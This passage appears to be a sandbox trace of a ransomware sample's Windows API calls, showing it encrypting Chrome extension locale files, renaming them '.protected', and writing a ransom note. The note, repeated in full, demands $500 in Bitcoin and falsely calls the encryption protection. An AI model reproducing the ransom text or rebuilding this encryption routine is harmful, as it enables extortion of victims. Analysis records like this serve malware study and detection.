data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.protected")) returned 1 [0080.122] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.122] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.122] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\RESTORE_FILES.txt") returned 159 [0080.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.122] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.122] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.123] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.123] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.123] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.123] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.123] CloseHandle (hObject=0x164) returned 1 [0080.124] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.124] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0080.124] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0080.124] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0080.124] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0080.124] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0080.124] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl") returned 141 [0080.124] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0080.124] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0080.124] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\*") returned 143 [0080.124] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.124] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.124] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.124] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.124] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.124] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.124] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\.") returned 143 [0080.124] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.124] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.124] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.124] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.124] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.124] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.124] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.124] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\..") returned 144 [0080.124] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.124] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.124] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.124] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.124] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.124] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.124] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.124] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.124] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json") returned 155 [0080.124] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.124] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.124] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.124] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json") returned 155 [0080.125] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json") returned 155 [0080.125] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json") returned 155 [0080.125] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.125] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0080.126] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.126] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0080.126] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.126] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.126] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.126] CloseHandle (hObject=0x168) returned 1 [0080.126] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.protected") returned 165 [0080.126] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\messages.json.protected")) returned 1 [0080.127] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.127] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.127] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\RESTORE_FILES.txt") returned 159 [0080.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.127] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.127] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.128] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.128] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.128] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.128] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.128] CloseHandle (hObject=0x164) returned 1 [0080.129] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.129] lstrcmpiW (lpString1="no", lpString2="Windows") returned -1 [0080.129] lstrcmpiW (lpString1="no", lpString2="Program Files") returned -1 [0080.129] lstrcmpiW (lpString1="no", lpString2="Program Files (x86)") returned -1 [0080.129] lstrcmpiW (lpString1="no", lpString2="$Recycle.bin") returned 1 [0080.129] lstrcmpiW (lpString1="no", lpString2="System Volume Information") returned -1 [0080.129] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no") returned 141 [0080.129] lstrcmpW (lpString1="no", lpString2=".") returned 1 [0080.129] lstrcmpW (lpString1="no", lpString2="..") returned 1 [0080.129] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\*") returned 143 [0080.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.129] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.129] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.129] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.129] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.129] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.129] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\.") returned 143 [0080.129] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.129] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.129] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.129] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.129] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.129] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.129] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.129] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\..") returned 144 [0080.130] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.130] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.130] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.130] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.130] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.130] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.130] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.130] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.130] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json") returned 155 [0080.130] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.130] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.130] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.130] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json") returned 155 [0080.131] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json") returned 155 [0080.131] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.131] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json") returned 155 [0080.131] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.131] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xbf, lpOverlapped=0x0) returned 1 [0080.132] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff41, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.132] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xbf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xbf, lpOverlapped=0x0) returned 1 [0080.132] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.132] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.132] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.133] CloseHandle (hObject=0x168) returned 1 [0080.133] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.protected") returned 165 [0080.133] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\messages.json.protected")) returned 1 [0080.133] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.133] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.134] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\no\\RESTORE_FILES.txt") returned 159 [0080.134] CreateFileW 